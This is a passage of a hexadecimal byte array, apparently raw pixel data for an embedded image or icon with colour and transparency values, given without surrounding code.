0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x80, 0x00, 0xff, 0x40, 0x00, 0xff, 0x20, 0x6f, 0xff, 0x20, 0xef, 0xff, 0x60, 0x2b, 0xff, 0x00, 0x00, 0xff, 0x00, 0xe7, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xef, 0xff, 0x60, 0x58, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xeb, 0xff, 0x61, 0x58, 0xff, 0x00, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xc7, 0xfe, 0xa1, 0x00, 0xff, 0x60, 0x4b, 0xff, 0x00, 0xff, 0xff, 0x20, 0x4f, 0xff, 0x20, 0x00, 0xff, 0xe0, 0x00, 0xff, 0x60, 0x00, 0xff, 0x40, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x14, 0xff, 0xa0, 0x13, 0xff, 0x60, 0x00, 0xff, 0x20, 0x00, 0xff, 0x00, 0x97, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xf8, 0xff, 0x60, 0x9b, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xfc, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xef, 0xff, 0x60, 0xb8, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x20, 0x78, 0xff, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x3f, 0xff, 0x40, 0x0c, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x2f, 0xff, 0x20, 0xff, 0xff, 0x40, 0x8c, 0xff, 0xa1, 0x17, 0xff, 0x00, 0xc0, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xff, 0x00, 0xab, 0xff, 0x60, 0x24, 0xff, 0x40, 0xac, 0xff, 0x00, 0xff, 0xfe, 0xc0, 0x00, 0xff, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x80, 0x00, 0xff, 0x60, 0x00, 0xfe, 0xe0, 0x27, 0xfe, 0xc0, 0xf8, 0xfe, 0xe0, 0xff, 0xff, 0x20, 0xef, 0xfe, 0xe0, 0xf8, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xf7, 0xff, 0x00, 0xfb, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0x00, 0xff, 0x00, 0x00, 0xff, 0x80, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xa0, 0x00, 0xff, 0x40, 0x63, 0xff, 0x60, 0x38, 0xff, 0x60, 0x1b, 0xff, 0x00, 0x27, 0xfe, 0xc0, 0xf3, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xef, 0xfe, 0x40, 0x00, 0xff, 0x61, 0x1f, 0xff, 0x60, 0x43, 0xff, 0x40, 0x30, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0xe0, 0x00, 0xfe, 0xe0, 0x8b, 0xfe, 0xe0, 0xff, 0xff, 0x20, 0xec, 0xff, 0x40, 0xdc, 0xfe, 0xe0, 0xfb, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xf8, 0xff, 0x41, 0xd7, 0xff, 0x00, 0xf0, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0x30, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x20, 0x00, 0xff, 0x20, 0x2c, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xe7, 0xfe, 0xe0, 0x14, 0xff, 0x40, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x10, 0xff, 0x60, 0x1c, 0xfe, 0xe0, 0x00, 0xff, 0x20, 0x00, 0xfe, 0xc0, 0xf0, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xc7, 0xff, 0x40, 0x00, 0xff, 0xa3, 0x00, 0xff, 0x60, 0x1c, 0xff, 0x60, 0x0f, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x80, 0x00, 0xff, 0x40, 0x3c, 0xff, 0x20, 0xff, 0xff, 0x40, 0xff, 0xff, 0x40, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xff, 0x40, 0xff, 0xff, 0x20, 0xff, 0xff, 0x20, 0xff, 0xff, 0x60, 0x18, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x80, 0x00, 0xff, 0x20, 0x03, 0xfe, 0xc0, 0xd3, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0x84, 0xfe, 0xe0, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x40, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x20, 0x00, 0xfe, 0xe0, 0x47, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xef, 0xfe, 0xa0, 0x14, 0xff, 0x60, 0x00, 0xff, 0x40, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x40, 0x00, 0xff, 0x60, 0x37, 0xff, 0x60, 0x70, 0xff, 0x60, 0xa7, 0xff, 0x61, 0xc7, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xf7, 0xff, 0x61, 0xc4, 0xff, 0x60, 0x97, 0xff, 0x60, 0x6b, 0xff, 0x60, 0x2b, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x80, 0x00, 0xff, 0x20, 0x2f, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x41, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x41, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x22, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x21, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xff, 0x00, 0xf7, 0xff, 0x60, 0x0c, 0xff, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x00, 0xfe, 0xe0, 0x00, 0xfe, 0xc0, 0x64, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x03, 0xff, 0xff, 0x23, 0xff, 0xff, 0x23, 0xff, 0xff, 0x23, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x42, 0xff, 0xff, 0x43, 0xff, 0xff, 0x44, 0xff, 0xff, 0x26, 0xff, 0xff, 0x26, 0xff, 0xff, 0x25, 0xff, 0xff, 0x23, 0xff, 0xff, 0x02, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0xf7, 0xfe, 0xc0, 0x30, 0xfe, 0xe0, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0xe0, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xfe, 0x00, 0x00, 0xfe, 0xc0, 0xb7, 0xfe, 0xc0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe1, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x01, 0xff, 0xff, 0x05, 0xff, 0xf7, 0x29, 0xff, 0xf7, 0x29, 0xff, 0xf7, 0x27, 0xff, 0xff, 0x45, 0xff, 0xff, 0x44, 0xff, 0xff, 0x43, 0xff, 0xff, 0x42, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x62, 0xff, 0xff, 0x42, 0xff, 0xff, 0x45, 0xff, 0xf7, 0x29, 0xff, 0xf7, 0x29, 0xff, 0xf7, 0x28, 0xff, 0xff, 0x06, 0xff, 0xff, 0x05, 0xff, 0xff, 0x04, 0xff, 0xff, 0x03, 0xff, 0xff, 0x02, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe1, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xe0, 0xff, 0xfe, 0xc0, 0xff, 0xfe, 0xc0, 0x9f, 0xfe, 0x61, 0x00, 0xff, 0x60, 0x00, 0xff, 